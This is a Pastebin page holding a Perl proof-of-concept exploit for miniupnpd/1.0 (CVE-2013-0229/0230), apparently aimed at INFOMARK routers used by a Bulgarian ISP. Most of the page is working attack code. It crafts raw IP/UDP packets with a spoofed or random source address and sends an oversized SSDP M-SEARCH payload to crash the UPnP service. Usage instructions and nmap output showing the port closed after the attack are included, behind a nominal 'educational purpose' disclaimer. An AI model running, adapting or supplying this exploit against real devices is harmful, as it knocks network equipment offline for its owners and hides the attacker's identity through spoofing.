Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #
- # miniupnpd/1.0 remote denial of service or stack overflow (PoC)
- #
- # Copyright 2015 (c) Todor Donev
- # todor.donev@gmail.com
- # http://www.ethical-hacker.org/
- # https://www.facebook.com/ethicalhackerorg
- #
- # The SSDP protocol can discover Plug & Play devices,
- # with uPnP (Universal Plug and Play). SSDP is HTTP
- # like protocol and work with NOTIFY and M-SEARCH
- # methods.
- #
- # See also:
- # CVE-2013-0229
- # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
- # CVE-2013-0230
- # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
- #
- # Tested on
- # Device Name : IMW-C920W
- # Device Manufacturer : INFOMARK (http://infomark.co.kr)
- #
- # These devices are commonly used by Max Telecom, Bulgaria
- #
- # Disclaimer:
- # This or previous program is for Educational
- # purpose ONLY. Do not use it without permission.
- # The usual disclaimer applies, especially the
- # fact that Todor Donev is not liable for any
- # damages caused by direct or indirect use of the
- # information or functionality provided by these
- # programs. The author or any Internet provider
- # bears NO responsibility for content or misuse
- # of these programs or any derivatives thereof.
- # By using these programs you accept the fact
- # that any damage (dataloss, system crash,
- # system compromise, etc.) caused by the use
- # of these programs is not Todor Donev's
- # responsibility.
- #
- # Use at your own risk!
- #
- # See also:
- # SSDP Reflection DDoS Attacks
- # http://tinyurl.com/mqwj6xt
- #
- #######################################
- #
- # # perl miniupnpd.pl
- #
- # [ miniupnpd/1.0 remote denial of service exploit ]
- # [ =============================================== ]
- # [ Usage:
- # [ ./miniupnpd.pl <victim address> <spoofed address>
- # [ Example:
- # [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
- # [ Example:
- # [ perl miniupnpd.pl 192.168.1.1
- # [ =============================================== ]
- # [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ]
- #
- # # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
- #
- # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
- # Nmap scan report for 192.168.1.1
- # Host is up (0.00078s latency).
- # PORT STATE SERVICE
- # 1900/udp open upnp
- # | upnp-info:
- # | 192.168.1.1
- # | Server: 1.0 UPnP/1.0 miniupnpd/1.0
- # | Location: http://192.168.1.1:5000/rootDesc.xml
- # | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
- # | Name: INFOMARK Router
- # | Manufacturer: INFOMARK
- # | Model Descr: INFOMARK Router
- # | Model Name: INFOMARK Router
- # | Model Version: 1
- # | Name: WANDevice
- # | Manufacturer: MiniUPnP
- # | Model Descr: WAN Device
- # | Model Name: WAN Device
- # | Model Version: 20070228
- # | Name: WANConnectionDevice
- # | Manufacturer: MiniUPnP
- # | Model Descr: MiniUPnP daemon
- # | Model Name: MiniUPnPd
- # |_ Model Version: 20070228
- # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
- #
- # Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
- #
- # # perl miniupnpd.pl 192.168.1.1
- #
- # [ miniupnpd/1.0 remote denial of service exploit ]
- # [ =============================================== ]
- # [ Target: 192.168.1.1
- # [ Send malformed SSDP packet..
- #
- # # nmap -sU 192.168.1.1 -p1900
- #
- # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
- # Nmap scan report for 192.168.1.1
- # Host is up (0.00085s latency).
- # PORT STATE SERVICE
- # 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D
- # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
- #
- # Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
- #
- #
- # Special thanks to HD Moore ..
- #
- use Socket;
- if ( $< != 0 ) {
- print "Sorry, must be run as root!\n";
- print "This script use RAW Socket.\n";
- exit;
- }
- my $ip_src = (gethostbyname($ARGV[1]))[4];
- my $ip_dst = (gethostbyname($ARGV[0]))[4];
- print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";
- print "[ =============================================== ]\n";
- select(undef, undef, undef, 0.40);
- if (!defined $ip_dst) {
- print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
- select(undef, undef, undef, 0.55);
- print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
- print "[ Example:\n[ perl $0 192.168.1.1\n";
- print "[ =============================================== ]\n";
- print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
- exit;
- }
- socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
- setsockopt(RAW, 0, 1, 1) or die $!;
- main();
- # Main program
- sub main {
- my $packet;
- $packet = iphdr();
- $packet .= udphdr();
- $packet .= payload();
- # b000000m...
- send_packet($packet);
- }
- # IP header (Layer 3)
- sub iphdr {
- my $ip_ver = 4; # IP Version 4 (4 bits)
- my $iphdr_len = 5; # IP Header Length (4 bits)
- my $ip_tos = 0; # Differentiated Services (8 bits)
- my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
- my $ip_frag_id = 0; # Identification Field (16 bits)
- my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
- my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
- my $ip_ttl = 255; # IP TTL (8 bits)
- my $ip_proto = 17; # IP Protocol (8 bits)
- my $ip_checksum = 0; # IP Checksum (16 bits)
- my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)
- # IP Packet construction
- my $iphdr = pack(
- 'H2 H2 n n B16 h2 c n a4 a4',
- $ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
- $ip_frag_id, $ip_frag_flag . $ip_frag_offset,
- $ip_ttl, $ip_proto, $ip_checksum,
- $ip_src, $ip_dst
- );
- return $iphdr;
- }
- # UDP header (Layer 4)
- sub udphdr {
- my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
- my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535)
- my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
- my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
- # UDP Packet
- my $udphdr = pack(
- 'n n n n',
- $udp_src_port, $udp_dst_port,
- $udp_len, $udp_checksum
- );
- return $udphdr;
- }
- # Create SSDP Bomb
- sub payload {
- my $data;
- my $head;
- $data = "M-SEARCH * HTTP\/1.1\\r\\n";
- for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
- my $payload = pack('a' . length($data), $data);
- return $payload;
- }
- # Generate random source ip address
- sub randip () {
- srand(time() ^ ($$ + ($$ << 15)));
- my $ipdata;
- $ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
- my $ipsrc = pack('A' . length($ipdata), rand($ipdata));
- return $ipdata;
- }
- # Send the malformed packet
- sub send_packet {
- print "[ Target: $ARGV[0]\n";
- select(undef, undef, undef, 0.30);
- print "[ Send malformed SSDP packet..\n\n";
- send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
- }
Add Comment
Please, Sign In to add comment